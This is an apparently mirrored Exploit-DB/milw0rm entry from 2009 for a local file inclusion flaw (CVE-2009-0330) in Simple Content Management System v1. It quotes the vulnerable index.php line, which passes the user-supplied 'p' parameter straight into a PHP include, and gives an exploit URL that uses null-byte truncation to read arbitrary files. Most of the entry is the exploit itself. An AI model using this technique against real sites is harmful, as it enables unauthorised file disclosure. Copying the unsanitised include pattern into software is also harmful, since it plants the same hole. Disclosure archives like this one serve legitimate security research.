[] NeoSense
E X P L O I T S
title author type platform port cve id

SCMS 1 - Local File Inclusion

Author: ahmadbady
type: webapps
platform: php
port: 
date_added: 2009-01-17 
date_updated: 2017-01-23 
verified: 1 
codes: OSVDB-51499;CVE-2009-0330 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comSCMSv1.zip
                           --:local file include:--
---------------------------------
script:simple content management system v 1

-------------------------------------------------------
download from:http://futurekast.com/fcms/php/SCMSv1.zip

-------------------------------------------------------

...............................................
vul:/index.php line 34:

<?php
 if (!isset($_GET['p']))
  include("../SCMSv1/includes/default.txt");
 } else include("includes/" . $_GET['p'] . ".txt");
 ?>
-------------------------------------------
-------------------------------------------
xpl:

http://127.0.0.1/path/index.php?p=[Lfi]%00

***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]

from:[iran]
---------------------------------------------------

# milw0rm.com [2009-01-18]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.